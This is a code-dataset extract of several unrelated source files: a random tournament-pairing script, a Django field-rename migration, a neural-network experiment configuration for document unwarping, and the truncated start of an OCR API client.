#tamanho1 = len(lista_trapaca1[0])
#print("TAMANHO1", tamanho1)
#print("INDICE_LISTA", indice_lista)
#input()
if(opcao_cheat==1):
for i in range(len(lista_trapaca1)):
tamanho1 = len(lista_trapaca1[i])
tamanho2 = len(lista_trapaca2[i])
print('*' * (tamanho1 + 8))
print('* %s *' % (lista_trapaca1[i]))
print('*' * (tamanho1 + 8))
# print('',end = '')
print("VERSUS")
print('*' * (tamanho2 + 8))
print('* %s *' % (lista_trapaca2[i]))
print('*' * (tamanho2 + 8))
print('')
print('')
while(j < num_participantes/2):
#print("PASSOU AQUI WHILE")
selecionado1 = random.choice(lista_participantes)
lista_participantes.remove(selecionado1)
tamanho1 = len(selecionado1)
selecionado2 = random.choice(lista_participantes)
lista_participantes.remove(selecionado2)
tamanho2 = len(selecionado2)
j+=1
print('*'*(tamanho1+8))
print('* %s *' % (selecionado1))
print('*'*(tamanho1+8))
print("VERSUS")
print('*' * (tamanho2+8))
print('* %s *' % (selecionado2))
print('*' * (tamanho2+8))
print('')
print('')
| [
"noreply@github.com"
] | noreply@github.com |
486600088a2abad3ca03cf64f577de09c1dd95df | 0070dfcf60926e47289dba8ec7db5b30d8148556 | /Website/oncon/testapp/migrations/0006_auto_20160503_1036.py | 7fa8dd7d6ab3354edca18d2bd65ab4fde15ae0b9 | [] | no_license | piyushthegamer/python-projects | fde5c54fdc7ef155e03d22063f80f4eaf95398d1 | 0c36685a3f74c57cb591ea6a0590f3598f70b163 | refs/heads/master | 2021-01-12T01:46:56.833122 | 2017-01-09T13:29:19 | 2017-01-09T13:29:19 | 78,430,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-03 05:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the ``TestVideo.idk`` field to ``idksi``."""

    dependencies = [
        ('testapp', '0005_testvideo'),
    ]

    operations = [
        migrations.RenameField(
            model_name='testvideo',
            old_name='idk',
            new_name='idksi',
        ),
    ]
| [
"piyush.thegamer@gmail.com"
] | piyush.thegamer@gmail.com |
274068ca686b8f9e974d3eafdfe1eeb963c21cbf | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation4_ch016_ep003_7_10/Gather2_W_fixGood_C_change/train/pyr_2s/L6/step10_a.py | f0754e9c5056e21c626cfe3e46433c46c93290ba | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,317 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__)  ### path of the step10_b.py currently being executed
code_exe_path_element = code_exe_path.split("\\")  ### split the path so we can find at which depth kong_model sits
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2")  ### find at which depth kong_model2 sits
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1])  ### locate the kong_model2 dir
import sys  ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print("    code_exe_path:", code_exe_path)
# print("    code_exe_path_element:", code_exe_path_element)
# print("    code_dir:", code_dir)
# print("    kong_layer:", kong_layer)
# print("    kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer  ### the -1 in the middle converts a length into an index
# print("    kong_to_py_layer:", kong_to_py_layer)
if (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:]  ### [7:] was meant to strip the "step1x_" prefix; later the meaningful names were kept, so 0 is used instead
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:]  ### [5:] was meant to strip the "mask_" prefix (added because a Python module name cannot start with a digit); the automatic ordering turned out acceptable, so 0 is used instead
elif(kong_to_py_layer > 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print("    template_dir:", template_dir)  ### example: template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_2side_L6 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
import Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.W_w_M_to_C_pyr.pyr_2s.L6.step10_a as W_w_M_to_C_p20_pyr
from Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.I_w_M_to_W_pyr.pyr_3s.L5.step10_a import ch032_1side_6__2side_5__3side_2__ep010 as I_w_M_to_W_p20_3s_L5_Good
#############################################################################################################################################################################################################
'''
exp_dir 是 決定 result_dir 的 "上一層"資料夾 名字喔! exp_dir要巢狀也沒問題~
比如:exp_dir = "6_mask_unet/自己命的名字",那 result_dir 就都在:
6_mask_unet/自己命的名字/result_a
6_mask_unet/自己命的名字/result_b
6_mask_unet/自己命的名字/...
'''
use_db_obj = type8_blender_kong_doc3d_v2
use_loss_obj = [mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wz").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wy").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cy").copy()] ### z, y, x 順序是看 step07_b_0b_Multi_UNet 來對應的喔
#############################################################
### 為了resul_analyze畫空白的圖,建一個empty的 Exp_builder
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1_and_1s6_2s6.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
ch032_1side_1__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s1__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_1__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
#############################################################
if(__name__ == "__main__"):
    print("build exps cost time:", time.time() - start_time)
    if len(sys.argv) < 2:
        ############################################################################################################
        ### Run directly (F5, or ``python step10_b1_exp_obj_load_and_train_and_test.py`` with no
        ### extra arguments) so the subprocess-only code below is never reached.
        ch032_1side_1__2side_1.build().run()
        # print('no argument')
        sys.exit()
    ### The line below serves step10_b_subprocess.py: it is equivalent to running
    ### ``python step10_b1_exp_obj_load_and_train_and_test.py "<some_exp>.build().run()"`` from cmd.
    # NOTE(review): eval() executes arbitrary code taken from argv; this is only
    # acceptable because the argument is generated by the project's own
    # step10_b_subprocess.py driver, never by untrusted input.
    eval(sys.argv[1])
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
64c64d4b26169cf61deb2becd4b52ca4a334ada7 | d5341a2f0b66ea5e323adf0f64fc67f68b5a21f7 | /pero-api-requests.py | 62120db413b11ad86e2f64eb862c3f00cfce9991 | [] | no_license | hankaluk/pero-api-request-ocr-script | d6b737e7550d384900f649fa2dbde11a3553bbab | 25371136f3264fdc6ce1570d8cfcb20a3fd61bc5 | refs/heads/master | 2023-02-28T07:47:48.491297 | 2021-02-08T16:55:29 | 2021-02-08T16:55:29 | 318,824,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,901 | py | import json
import logging
import os
import time
import requests
# Connection settings come from the environment (e.g. a .env file / deployment config).
SERVER_URL = os.environ.get('SERVER_URL')
API_KEY = os.environ.get('API_KEY')
INPUT_FILE = os.environ.get('INPUT_FILE')
# Every request authenticates with the API key and sends/receives JSON.
headers = {"api-key": API_KEY, "Content-Type": "application/json"}
# Main application logger, writing to main_logs.log.
file_handler = logging.FileHandler('main_logs.log')
formatter = logging.Formatter("%(asctime)s:%(name)s:%(levelname)s:%(message)s")
file_handler.setFormatter(formatter)
logger_main = logging.getLogger(__name__)
logger_main.setLevel(logging.DEBUG)
logger_main.addHandler(file_handler)
def main():
    """Run one OCR batch end to end.

    Submits the request described by INPUT_FILE, polls the server until the
    request is processed, then downloads the txt (and, where available, alto)
    results for every image in the request.
    """
    format_txt = "txt"
    format_alto = "alto"

    # Load the request JSON and collect the names of the images it contains.
    file_names = []
    try:
        with open(INPUT_FILE, "r", encoding="utf-8") as input_file:
            try:
                data = json.load(input_file)
                for key in data.get("images").keys():
                    file_names.append(key)
            except json.JSONDecodeError as err:
                logger_main.error(f"Error occurred: {err}")
                exit(1)
            except KeyError as err:
                logger_main.error(f"Error occurred: {err}")
                exit(1)
    except FileNotFoundError as err:
        logger_main.error(f"Error occurred: {err}")
        exit(1)
    except Exception as err:
        logger_main.error(f"Error occurred: {err}")
        exit(1)

    # Create the destination directories for the downloaded results.
    output_dir = create_destination()

    logger_main.info("Processing started.")
    start = time.time()

    # Send the data for processing; retry until the server hands out an id.
    request_id = ""
    while not request_id:
        request_id = post_processing_request(data)
    # time.sleep(10800)  # 3 hour wait for the processing of 1500-2000 images in one request
    time.sleep(60)

    # One session for the whole (potentially very long) processing phase.
    session = requests.Session()

    failed_files = []
    unprocessed_files = []
    # Poll until the server reports the request as processed.
    # Bug fix: the old loop also slept for 10 minutes *after* processing
    # had already finished; now it only sleeps while still waiting.
    while not request_status(session, request_id):
        time.sleep(600)

    # Separate logger for the download phase.
    file_handler_result = logging.FileHandler('result_download.log')
    file_handler_result.setFormatter(formatter)
    result_logger = logging.getLogger("result_logger")
    result_logger.setLevel(logging.INFO)
    result_logger.addHandler(file_handler_result)

    # Download the results; classify anything that is not done yet.
    for name in file_names:
        result = download_results(session, output_dir, request_id, name, format_txt, result_logger)
        if result == "PROCESSED":
            download_results(session, output_dir, request_id, name, format_alto, result_logger)
        else:
            processing = check_status(session, request_id, result)
            if processing == 'PROCESSING_FAILED':
                failed_files.append(name)
            else:
                unprocessed_files.append(name)

    # Keep retrying files that were not finished yet.
    while unprocessed_files:
        result_logger.info(unprocessed_files)
        time.sleep(1800)  # wait for the remaining files to be processed
        # Bug fix: iterate over a copy -- removing from the list while
